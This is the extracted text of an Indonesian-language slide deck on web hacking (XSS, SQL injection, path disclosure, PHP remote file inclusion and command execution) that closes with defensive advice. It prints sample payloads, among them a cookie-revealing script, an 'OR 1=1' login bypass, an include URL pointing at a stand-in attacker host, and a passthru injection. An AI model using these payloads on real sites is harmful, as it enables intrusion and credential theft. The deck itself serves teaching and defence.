Ahmad Muammar W. K.
Details Web Hacking Threat Simulation Impact Discussion
Web Hacking Hacking melalui HTTP [ hacking over http ] Hacking terhadap Web Application Melalui port 80 ; port HTTP Memanfaatkan kelemahan dari web application Web browser attack Bypassing Firewall? Menggunakan HTTP rules (method) Get, Put, Post, Options, find, Delete, Trace
Hyper Text Transfer Protocol (HTTP) terletak pada bagian atas dari gambar Security level yaitu APLIKASI
http request (clear text/ ssl) Apache IIS Tomcat Netscape Plugins Perl PHP JSP E.t.c User Http reply (HTML, Javascript, VBscript) Firewall Web Server Web application MsSQL Postgre Mysql Oracle Database Server
Ahmad Muammar W. K.
Client side attack (xss, cookies stealing) Information Disclosure OS commanding (SQL, SSI, Ldap, Xpath ) Web Hacking Brute Force Denial Of Service Path travesal Remote command execution (php) Sumber: http://www.webappsec.org Etc
Client Side Attack Cross Site Scripting Suatu Jenis Serangan dengan cara memasukkan code/script HTML (javascript) kedalam suatu web site dan dijalankan melalui browser di client Contoh <script>alert(document.cookie)</script> Mendapatkan Cookies yang berisi info berharga milik client yang digunakan oleh server untuk proses authentikasi
Information Disclosure Predictable resource location Jenis serangan dengan menebak letak resource yang disembunyikan dan umum di gunakan oleh web aplikasi Contoh : /admin/ /backup/ /logs/ /PhpMyadmin/ admin.php login.php
SQL injection Suatu Cara untuk Mengexploitasi Web Application yang menggunakan suatu database, dan memasukan command sql,sehingga membentuk suatu query yang akan dieksekusi dan dijalankan oleh sql server. Contoh: http://victim.com/login.asp yang menerima input user dan pass attacking input user = test OR 1 = 1 && input pass =test Syntax SQL : select * from users where pass= test and user = test or 1 = 1 Passing the login box!!!
Path Traversal Suatu jenis vulnerabilities yang mengakibatkan user dapat melihat secara lengkap path suatu direktori atau file dari suatu situs/website Contoh : http://target.com/appx/sources/admin.php Fatal error: Call to undefined function: is_admin() in /var/www/html/user/target/appx/sources/admin.php on line 32 Diketahui bahwa halaman web target.com terletak di /var/www/html/user/target Kegunaan bagi attacker Mempersingkat waktu untuk mencari letak web direktori target Informasi tambahan jika telah memiliki akses ke server. = pwd pada situs target
Ahmad Muammar W. K.
PHP under attack* Remote file inclusion Remote Command execution *2 jenis serangan terhadap web aplikasi yang berbasis php
PHP under attack Remote File inclusion Suatu jenis serangan yang dilakukan dengan meng-include-kan halaman web lain kepada suatu situs/web aplikasi. Contoh Situs yang vulnerable http://victim.com/index.php?file=readme.txt URL code : http://victim.com/index.php?file=http://echo.or.id
victim http://echo.or.id
PHP under attack Shot! Modifikasi inclusion page <?php phpinfo();?> Change url http://echo.or.id > http://attacker.xxx/in.txt
Real site
PHP under attack Remote Command Execution Suatu jenis serangan yang dilakukan dengan meng-include-kan tag-tag bahasa pemrograman secara remote dan mengakibatkan web yang vulnerable akan mengeksekusi request yang di kirimkan. Contoh Situs yang vulnerable http://victim.com/viewtopic.php?t=48 URL code: http://victim.com/viewtopic.php?t=48&highlight=%2527.passthru($http_get_vars[a]).%2527 &a=id;pwd
Ahmad Muammar W. K.
Most Impact Defacing Data Stolen Etc
Defacing Kegiatan merubah/merusak tampilan suatu website baik halaman utama (index) ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (folder lain ; file lain)
Motives Dendam atau perasaan gak puas* Kenikmatan tersendiri, 'defacer' merasa tertantang Intrik politik, Sosial Penyampaian pesan Keuntungan Materill Prestice dalam kelompok
As a User Gunakan Firewall, Antivirus, Anti Trojan, Good Backup Facility dsb Penggunaan Password / pass phrase yang baik Berhati hati terhadap semua tawaran menggiurkan (attachment/program) Penggunaan fasilitas secara hati hati (warnet; public internet café) Penggunaan Secure login/secure connection (https ; ssh) Update Informasi
As a Developer Secure programming Gunakan Input Validation yang baik Gunakan Enkripsi untuk authentikasi dan proses lain yang di anggap perlu Matikan error_log ( kecuali saat development ) Sesuai Kebutuhan dan kemampuan! Update informasi secara general dan informasi specifik engine yang digunakan
As an Administrator Policy (strict restriction) Setting Optimal (Sesuai kebutuhan) pada environtment ; configurasi server Batasi Fungsi yang bisa berinteraksi dengan system environtment Php (passthru, system, exec) ; mssql (xp_cmdshell, xp_regdeletekey, xp_msver) Update Patch terbaru untuk application Selalu Update Informasi
Ahmad Muammar W. K.